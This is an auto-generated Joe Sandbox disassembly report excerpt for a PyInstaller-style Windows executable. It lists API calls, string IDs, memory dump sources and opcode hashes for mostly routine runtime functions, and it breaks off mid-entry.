                                                                                                                                                                                                                                                              • Opcode ID: af50f55acc611b54009b4ea4d598cf3424078558251c62237d26469a9987366e
                                                                                                                                                                                                                                                              • Instruction ID: e13a0a13b6823224e8d1fd6a82e98480370f59b420b4e4f35129743b48063093
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af50f55acc611b54009b4ea4d598cf3424078558251c62237d26469a9987366e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE01C422E2D27340FEA26B6167403791990DF40390F148538E92DC2ACBDE2FE4514B0B
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60BDBBC: HeapAlloc.KERNEL32(?,?,?,00007FF6E60B0D24,?,?,?,00007FF6E60B2236,?,?,?,?,?,00007FF6E60B3829), ref: 00007FF6E60BDBFA
                                                                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF6E60C3AAB,?,?,?,00007FF6E60BA4E7,?,?,?,00007FF6E60BA3DD,?,?,?,00007FF6E60BA7BE), ref: 00007FF6E60C0F29
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocAllocate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2177240990-0
                                                                                                                                                                                                                                                              • Opcode ID: 1814f6a7f99628077e6790dcc214134e096980326a86c6b7395bc1920f775fdf
                                                                                                                                                                                                                                                              • Instruction ID: 71cccd53435960e5ef1b44e20b6415ab6fb80e9351555573ef2dd7477713441d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1814f6a7f99628077e6790dcc214134e096980326a86c6b7395bc1920f775fdf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4016253E6C22784FE64AB6297407B901505F44BA0F088631DD2FCE6C6EE2FE541C22B
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                                              • Opcode ID: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
                                                                                                                                                                                                                                                              • Instruction ID: a32aaae194af85a2bb50d98e0fd6d4fb1d7db46f0bb83bbdb8857a87168204d2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3E0EC66E2932642FA56BAA14B823BD15108F58341F44C830DA19CA2DBEE2F6C65572B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 377330604-0
                                                                                                                                                                                                                                                              • Opcode ID: 24b2c4150c1d5606f670cbde58673d25452eaf2973990e0a8e410a01c1b9a188
                                                                                                                                                                                                                                                              • Instruction ID: 86cc5cd3dcf647c0a50436001151240c2bb89d5854fffa007848cc117dfd6f22
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24b2c4150c1d5606f670cbde58673d25452eaf2973990e0a8e410a01c1b9a188
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF418227D2C69581EA11DB24D6053FD2360FBA5784F54A332DF8D92193EF2AE6D8C305
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,00000000,00007FF6E60BB9A6,?,?,?,00007FF6E60BAB67,?,?,00000000,00007FF6E60BAE02), ref: 00007FF6E60BF1AD
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                                                              • Opcode ID: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
                                                                                                                                                                                                                                                              • Instruction ID: fe83fd6e4daebfc5e5ef176b427a5ab8ab34a29e5d3929c409cbc6cfce5c7f76
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8F06287B2A22681FE589661DB103B942915F48B40F4CEC30CD0ECB3C6DE1FE481822A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF6E60B0D24,?,?,?,00007FF6E60B2236,?,?,?,?,?,00007FF6E60B3829), ref: 00007FF6E60BDBFA
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                                                              • Opcode ID: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
                                                                                                                                                                                                                                                              • Instruction ID: bb868a15249bf26ea5eb687064e239d608c5a3eac370552bc5baa83f665a794f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92F01213B3D27785FE5856615B417F592909F44764F188A30DD2ECA2CADE5FA480822B
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                                                                                              • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                              • API String ID: 190572456-2208601799
                                                                                                                                                                                                                                                              • Opcode ID: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
                                                                                                                                                                                                                                                              • Instruction ID: 3de832b2302b8cb4f55c8b6bb2d7fe7bdbf1e24bdc851d64f2b16c78cbf73714
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24E1F967A7DB2391FA058B14AB503B467B1AF04781B945135C81E8A2A4FF7FB448C22F
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                                                                                                              • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                                                                                                              • API String ID: 2446303242-1601438679
                                                                                                                                                                                                                                                              • Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                                                                                                                                                                                                                              • Instruction ID: d86d6e0cbc78f1b943150f519088be2f0ae244d9354dbd7fe95dc569254f024f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02A18937628B9587E3148F11E69479EB364F788B84F604129EB9E47B24CF7EE164CB00
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                              • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                              • Opcode ID: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
                                                                                                                                                                                                                                                              • Instruction ID: 01a2c4868f33fba3812f2e4208f5847a26f8a5c5a18e21b5833b5ea373ae9cb0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9B21673A282A28BE725CF64D6407FD37A1FB44398F401135DA0E9BA85DF3BA900CB55
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00007FF6E60A2A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A8587
                                                                                                                                                                                                                                                              • FormatMessageW.KERNEL32 ref: 00007FF6E60A85B6
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32 ref: 00007FF6E60A860C
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E60A87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A2A14
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A29E0: MessageBoxW.USER32 ref: 00007FF6E60A2AF0
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                                                                                              • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstallem: FormatMessageW failed.$PyInstallem: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                                                                                              • API String ID: 2920928814-3505189403
                                                                                                                                                                                                                                                              • Opcode ID: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
                                                                                                                                                                                                                                                              • Instruction ID: 0a32843e1ef2c168964c86ba2ef49b896dcaf65db5a2977d7e7270ecae7af24d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0218072A28A5282F720DB15EA9436A63A0FF883D4F840135E54ED76E4DF3FD145CB1A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                                                              • Opcode ID: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
                                                                                                                                                                                                                                                              • Instruction ID: 7a95f018ab83f649e9363d7524e5ba248d8265a9cd49b7ecc592ef8c7e3e4cb8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2316B73618A918AEB609F64E8403ED3364FB84784F44443ADA4E87B98DF3AD648C719
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                                                              • Opcode ID: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
                                                                                                                                                                                                                                                              • Instruction ID: 4bc0dde511f432e51653bca4d7d4d00763641d2a2e4b0f240c473b6a9e301c1e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92318233618B9186DB60CF24E8443AD33A4FB84794F504135EE8E87B98DF3AC545CB05
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                                                              • Opcode ID: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
                                                                                                                                                                                                                                                              • Instruction ID: ffbda31d2fd452d4feb6dad7796dd15e231a75ad7abaa140bba8a8cd777e73ed
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80B1E423B386A241EA60DB659A143B96350EB94BD0F544132EE5F8BBC9DF3FE441C316
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                                              • Opcode ID: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
                                                                                                                                                                                                                                                              • Instruction ID: 6ab0cc6df2e7b6d783afd6115cf9a41e3415b71eb3627a5ec1809d9b5c89ec8d
